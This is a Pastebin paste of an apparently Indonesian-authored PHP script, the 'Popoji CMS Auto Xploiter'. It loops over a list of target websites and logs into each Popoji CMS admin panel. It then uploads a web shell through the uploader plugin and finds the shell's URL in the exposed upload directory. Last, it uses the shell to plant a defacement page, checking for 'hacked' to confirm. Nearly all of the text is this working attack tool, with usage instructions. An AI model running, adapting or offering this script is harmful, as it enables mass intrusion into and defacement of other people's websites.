API tools faq
paste
View difference between Paste ID: mG67qdjM and xtdNLkjM
SHOW: | | - or go back to the newest paste.
1
<?php
2
set_time_limit(0);
3
error_reporting(0);
4
5
function login($url,$user,$pass) {

6
	$post_login = array(

7
		"mod" => "login",

8
		"act" => "proclogin",

9
		"username" => $user,

10
		"password" => $pass,

11
		);

12
	$ch = curl_init();

13
		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

14
		  curl_setopt($ch, CURLOPT_URL, $url."/po-admin/login.php");

15
		  curl_setopt($ch, CURLOPT_POST, true);

16
		  curl_setopt($ch, CURLOPT_POSTFIELDS, $post_login);

17
		  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

18
		  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

19
		  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

20
		  curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');

21
		  curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');

22
		  curl_setopt($ch, CURLOPT_COOKIESESSION, true);

23
	return curl_exec($ch);

24
		  curl_close($ch);

25
}

26
function ch($url,$post) {

27
	$ch = curl_init($url);

28
	if($post !=null) {

29
		  curl_setopt($ch, CURLOPT_POST, true);

30
		  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

31
	}

32
		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

33
		  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

34
		  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

35
		  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

36
		  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');

37
		  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');

38
	return curl_exec($ch);

39
		  curl_close($ch);

40
}

41
function cek($url) {

42
	$ch = curl_init($url);

43
		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

44
		  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

45
		  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

46
		  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

47
		  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');

48
		  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');

49
	return curl_exec ($ch);

50
		  curl_close($ch);

51
}

52
function cover() {

53
	echo "<--------------------><-------------------->\n";

54
	echo "[ Popoji CMS Auto Xploiter ]\n";

55
	echo "// Coded by Mr. Error 404 ft. tu5b0l3d - IndoXploit //\n";

56
	echo "cara pake: php popoji.php [list_target.txt] [shell_kalian.jpg] [shell_kalian.php] [file_deface.html]\n";

57
	echo "contoh: php popoji.php target.txt indoxloit.jpg indoxploit.php deface.html\n";

58
	echo "<--------------------><-------------------->\n\n\n";

59
}

60
$username_popoji = "indoxploit"; // ganti dengan username kalian.

61
$password_popoji = "indoxploit"; // ganti dengan paasword kalian.

62
$sites = explode("\n", file_get_contents($argv[1]));

63
$shell = $argv[2];

64
$nama_shell = $argv[3];

65
$deface = $argv[4];

66
$pecah = explode(".", $nama_shell);

67
$nama = $pecah[0];

68
$ext = $pecah[1];

69
if(isset($sites) AND isset($shell) AND isset($nama_shell) AND isset($deface)) {

70
	cover();

71
	foreach($sites as $url) {

72
		echo "[+] Nyecan: $url\n";

73
		$login = login($url, $username_popoji, $password_popoji);

74
		if(preg_match("/beranda|keluar|selamat datang|member|admin/i", $login)) {

75
			echo "[+] Login OK\n";

76
			$post_upload = array(

77
				"file" => "@$shell",

78
				"name" => $nama_shell,

79
				);

80
			ch($url."/po-admin/js/plugins/uploader/upload.php", $post_upload);

81
			$cek_folder = cek("$url/po-content/po-upload/");

82
			if(preg_match("/Index of \/po-content\/po-upload/", $cek_folder) AND !preg_match("/403/", $cek_folder)) {

83
				preg_match("/<li><a href=\"$nama-(.*?)-polibrary.$ext\">/", $cek_folder, $shellmu);

84
				$shellmu[1] = "$nama-".$shellmu[1]."-polibrary.$ext";

85
				$link_shell = $url."/po-content/po-upload/".$shellmu[1];

86
				echo "[+] Shellmu: $link_shell\n";

87
				$post_deface = array(

88
					"tipe_upload" => "home_root",

89
					"ix_file" => "@$deface",

90
					"upload" => "upload",

91
					);

92
				$depes = ch($link_shell."?do=upload", $post_deface);

93
				if(preg_match("/uploaded!/i", $depes) AND preg_match("/hacked/i", cek("$url/$deface"))) {

94
					echo "[+] Sukses Depes! -> $url/$deface\n\n";

95
				} else {

96
					echo "[-] Gagal Depes!!\n\n";

97
				}

98
			} else {

99
				echo "[+] Lokasi Shellnya forbidden / kena tebas gann :(\n\n";

100
			}

101
		} else {

102
			echo "[+] Login Gagal\n\n";

103
		}

104
	}

105
} else {

106
	echo "cara pake: php ".$argv[0]." [shell_kalian.jpg] [shell_kalian.php] [file_deface.html]\n";

107
	echo "contoh: php ".$argv[0]." shell.jpg indoxploit.php deface.html\n";

108
}

109
?>
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!